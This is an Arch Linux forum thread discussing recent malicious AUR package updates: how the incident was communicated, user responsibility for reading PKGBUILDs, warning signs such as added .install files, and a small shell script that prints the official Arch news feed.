multiple malicious AUR updates

5hridhyan · Yesterday 18:14:23

gofree wrote:

Moving to debian, in my opinion this has not been communicated very well.

Just because of the AUR incident(s)? LoL

Last edited by 5hridhyan (Yesterday 18:14:45)

gofree · Yesterday 18:36:45

Yeah, kinda all my servers are now debian and this communication and uncertanity made me move.

5hridhyan wrote:

gofree wrote:
Moving to debian, in my opinion this has not been communicated very well.
Just because of the AUR incident(s)? LoL

seth · Yesterday 18:45:24

in my opinion this has not been communicated very well.

It would probably be more productive to quantify that communication deficit.

Fwwi, https://archlinux.org/news/
You can subscribe to that and I've also (previously posted) a script one could motd.

gofree · Yesterday 18:51:23

Sure I've seen that. Probably like every other guy I tried to find some "next steps - what needs to be done". Where is the list, what to check, etc...preferably on a visible place not hunting down reddit, phoronix, various forums for "semi-official" guides. That's something that could have been done better. Just my 2 cents.

Reboot9012 · Yesterday 20:23:02

Why is there so much outrage the philosophy and scope of this project is well known for a long time just because new people install arch or use arch derivates that doesn't change the goal of this project the end responsibility is with the user.The aur is not an official repo and should be examined when installing things.The arch team can decide if they can take some measures for this incident but I don't understand this finger wagging nobody owes you anything and if you are unhappy you can change distros.

Last edited by Reboot9012 (Yesterday 20:24:58)

gofree · Yesterday 20:27:34

No outrage here. I just think the scope of the impact deserved a wee bit more.

ArchibaldPancakes · Today 03:17:03

So this is essentially garbage but considering that the main issue is steamdeck users, and calling out violation of archlinux philosophy doesn't deter complaint,

I cobbled together a non tested additional aur check topology design in the AI slop phase for a centralized server maintaining problem child repos and client side checking of git aur packages and URLs within pkgbuild as well as common issues.

Maybe as something for someone to fork and deliver on.

https://github.com/willWallace-RIT/Badrepos_git

cfr · Today 05:45:00

gofree wrote:

Sure I've seen that. Probably like every other guy I tried to find some "next steps - what needs to be done". Where is the list, what to check, etc...preferably on a visible place not hunting down reddit, phoronix, various forums for "semi-official" guides. That's something that could have been done better. Just my 2 cents.

But that's the point: AUR is **not** official software. And there is no possible definitive list of checks other than *either* do not use AUR package *or* read the `PKGBUILD`s and ensure you are happy executing them. That list of checks is the **only** one which can give you any guarantees. It has also been the standard list of checks for as long as I have used Arch.

cfr · Today 06:18:36

seth wrote:

Fwwi, https://archlinux.org/news/
You can subscribe to that and I've also (previously posted) a script one could motd.

Is the script in another thread? I thought I checked through this one, but sorry if I missed it.

I was suspicious because I have `npm` installed and no idea why, but I apparently installed it 4 years ago, which is plenty of time for me to forget.

[I always read PKGBUILDs or diffs but I cannot say I understand everything or would never miss anything.]

seth · Today 06:57:05

Probably in the little scripts one or some other time somebody missed some news.

#!/bin/sh
export LC_ALL=C
THIS_MONTH="$(date +'%b %Y')"
LAST_MONTH="$(date +'%b %Y' -d -1month)"
curl -sL 'https://archlinux.org/feeds/news/' | tr '\n' ' ' | \
xmlstarlet sel -T -t -m "//rss/channel/item[contains(string(pubDate), '$LAST_MONTH') or contains(string(pubDate), '$THIS_MONTH')]" \
                        -o $'\n\e[33m' -v pubDate -o $'\n\e[0;1m' -v title -o $'\e[0m' -v description -o $'\n\n────────────────\n' |\
sed $'s/<p>/\\n\\n/g; s/<h.>/\\n\\n\e[1;34m/g; s%</\(h.\|b\|em\|strong\|pre\|code\)>%\e[0m%g;
    s/<li>/\\n· /g;
    s/<\(code\|pre\)>/\e[1;32m/g;
    s/<\(strong\|em\)>/\e[1m/g;
    s/&gt;/>/g; s/&lt;/</g; s/<[^>]*>//g' | fold -sw 100

It just gets the rss feed, filters out the recent months and then turns the html into ansi escape sequences.

Fwwi, I think gofree meant to get some links to the relevant aur-general threads, maybe https://md.archlinux.org/s/SxbqukK6IA and something like https://ioctl.fail/preliminary-analysis-of-aur-malware/
Which is fair, though it would have been necessary to stress that the full extent of the compromise is still unknown and generally void returns from the above by no means prove that your system isn't ridden with malware if you've so far been yolo-ing the AUR.

I cannot say I understand everything or would never miss anything

Understanding that you don't understand most things is the entrance to the path of wisdom. I think I told that some greek dude like 2500 years ago…
The recent attacks have not been very sophisticated, the introduction of npm to those packages is completely nonsensical and would probably have stalled you and the most recent stunt to obfuscate code basically yells "hey look at me, I'm doing something shady"

Lone_Wolf · Today 09:26:45

Archlinux wiki pages ,aur home page and forum users have warned AUR packages are untrusted, need to be checked before use etc for 2 decades .
The danger of using aur helpers (especially pacman wrappers) is unsupported and a bad idea unless you know exactly how things work and why you need that specific aur helper .

I am subscribed to all notications of every aur package I use and even keep those notifications on for packages I used to maintain.

The only notification of a commit change that was related to the attack was from the staden package which I started 15+ years ago.

If somethings needs to be shut down my vote would be to ban all pacman wrappers as a starting point .

kokoko3k · Today 10:18:05

While what is happening will not make me move anywhere else than Arch, and while I understand and agree that the AUR is under the exclusive responsibility of the user, I also agree that even a non exhaustive guide on what to check to be sure an user has installed a malicious package might have been helpful.

There are probably things that I don't know and that led them to decide not to do it.

Last edited by kokoko3k (Today 10:19:08)

Lone_Wolf · Today 10:31:03

For the recent attack that's not too hard :

Almost all functionality for which .install files were needed has been moved to pacman hooks.
About the only thing .install is still used for is to show some warning to users upon install/upgrade/removal through the echo command.

Any aur package that adds a .install file should trigger all its users to check the .install file.

dasrubbellos · Today 10:54:36

Lone_Wolf wrote:

I am subscribed to all notications of every aur package I use and even keep those notifications on for packages I used to maintain.

That's a fantastic idea! AUR helpers should have an option to automatically do that. Does aurweb have an API?

tridra · Today 11:11:43

I also agree that even a non exhaustive guide on what to check to be sure an user has installed a malicious package might have been helpful.

If there needs to be a guide, I believe it will have to show how simple it is to read the average diff of a PKGBUILD, which in most cases it's just a bump to a new version and new checksum. The biggest misconception I've seen so many times is people believing that reading the PKGBUILD every time you update is time consuming, so they don't even try. In many cases people don't even know that the package source code and the PKGBUILD are different things.

Arch Linux

#101 Yesterday 18:14:23

Re: multiple malicious AUR updates

#102 Yesterday 18:36:45

Re: multiple malicious AUR updates

#103 Yesterday 18:45:24

Re: multiple malicious AUR updates

#104 Yesterday 18:51:23

Re: multiple malicious AUR updates

#105 Yesterday 20:23:02

Re: multiple malicious AUR updates

#106 Yesterday 20:27:34

Re: multiple malicious AUR updates

#107 Today 03:17:03

Re: multiple malicious AUR updates

#108 Today 05:45:00

Re: multiple malicious AUR updates

#109 Today 06:18:36

Re: multiple malicious AUR updates

#110 Today 06:57:05

Re: multiple malicious AUR updates

#111 Today 09:26:45

Re: multiple malicious AUR updates

#112 Today 10:18:05

Re: multiple malicious AUR updates

#113 Today 10:31:03

Re: multiple malicious AUR updates

#114 Today 10:54:36

Re: multiple malicious AUR updates

#115 Today 11:11:43

Re: multiple malicious AUR updates

Board footer